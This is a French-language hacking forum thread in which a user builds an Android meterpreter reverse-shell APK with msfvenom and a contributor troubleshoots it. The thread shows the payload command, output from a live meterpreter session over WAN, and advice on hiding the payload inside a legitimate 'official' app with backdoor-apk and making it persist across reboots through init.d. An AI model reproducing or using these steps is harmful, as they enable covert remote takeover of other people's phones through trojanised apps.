Auteur Sujet: APK backdoor  (Lu 3231 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne crash

  • Membre Junior
  • *
  • Messages: 10
  • +0/-0
APK backdoor
« le: 12 novembre 2017 à 15:43:20 »
Bien le bonjour,

Voila j'essaie avec ma tablette d'utiliser une backdoor apk .

voici les commandes que je tape :

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.73 LPORT=8080 R > /root/whatever.apk

APK crée

Les commandes :



Je n'ai pas accès a la commande 'meterpreter >'


Scan avec nmap port 8080 OPEN

J'ai essayer avec d'autre port identique .

Version android de ma tablette à jours ?

Merci pour vos réponses





Hors ligne _john_doe

  • Contributeur de Kali-linux.fr
  • Membre VIP
  • *****
  • Messages: 606
  • +36/-5
Re : APK backdoor
« Réponse #1 le: 13 novembre 2017 à 17:39:00 »
Salut,
On ne voit pas assez bien tes commandes (thumb) donc difficile de t'aider.
La creation de ton payload est correcte (payload en LAN)
Je viens d'essayer sur un android  version nougat 7 et le meterpreter passe tranquille (en LAN et en WAN) donc ce n'est pas la version de ta tablette qui pose probleme.
Une session en WAN :

msf exploit(handler) > sessions

Active sessions
===============

  Id  Name  Type                        Information          Connection
  --  ----  ----                        -----------          ----------
  6         meterpreter dalvik/android  u0_a252 @ localhost  192.168.0.23:4444 -> 77.136.XX.XX:49367 (77.136.XX.XX)

msf exploit(handler) > sessions 6
[*] Starting interaction with 6...

meterpreter > sysinfo
Computer    : localhost
OS          : Android 7.0 - Linux 3.18.14-12246902 (aarch64)
Meterpreter : dalvik/android

Je penche plutot pour la facon dont tu l'a installé sur ta tablette ton APK.
Pour obtenir un shell il faut non seulement installer ton APK mais aussi qu'il tourne en background
Pourquoi passes tu par le port 8080 ? tu es derriere un proxy ?

EDIT comme on ne voit pas bien ta capture d'écran peut etre as tu un meterpreter mais qu'il est en background
tapes :
msf exploit(handler) > sessionset tu verras si une session meterpreter est en cours


« Modifié: 13 novembre 2017 à 17:54:43 par _john_doe »

Hors ligne crash

  • Membre Junior
  • *
  • Messages: 10
  • +0/-0
Re : APK backdoor
« Réponse #2 le: 14 novembre 2017 à 15:59:10 »
Bonjour,

D'abord Merci John_Doe pour ta réponse .

Désolé pour le screenshot small  ;D

Effectivement simplement la commande sessions ma permis de faire fonctionner cette apk .

Je vais tenter une apk mieux travailler .

Je n'ai pas pris le temps de lire le man .

Milles excuses  ;D

Merci encore  ::)

Hors ligne _john_doe

  • Contributeur de Kali-linux.fr
  • Membre VIP
  • *****
  • Messages: 606
  • +36/-5
Re : APK backdoor
« Réponse #3 le: 16 novembre 2017 à 19:32:58 »
Si tu veux aller plus loin va falloir apprendre le JAVA si ce n'est deja fait  :) car c'est le langage utilisé pour coder les app Android.
Pour un APK plus évolué tu peux utiliser backdoor-apk qui est plutot pas mal et qui permet de binder MainActivity (qui est le payload java généré par msfvenom) dans une apk "officielle".
Il mergera les 2 apk en donnant le bon manifest et une fois installé sur ton telephone, chaque fois que tu lancera cette appli le payload sera appelé.

Il ne marche pas avec toutes les APK mais avec de nombreuses.

Une autre facon de faire pour rendre le payload persistant c'est de dowloader dans init.d de ton telephone un script SDB qui appelera MainActivity à intervalle regulier. Ainsi ton payload sera persistant meme apres un reboot du tel.
« Modifié: 16 novembre 2017 à 19:35:24 par _john_doe »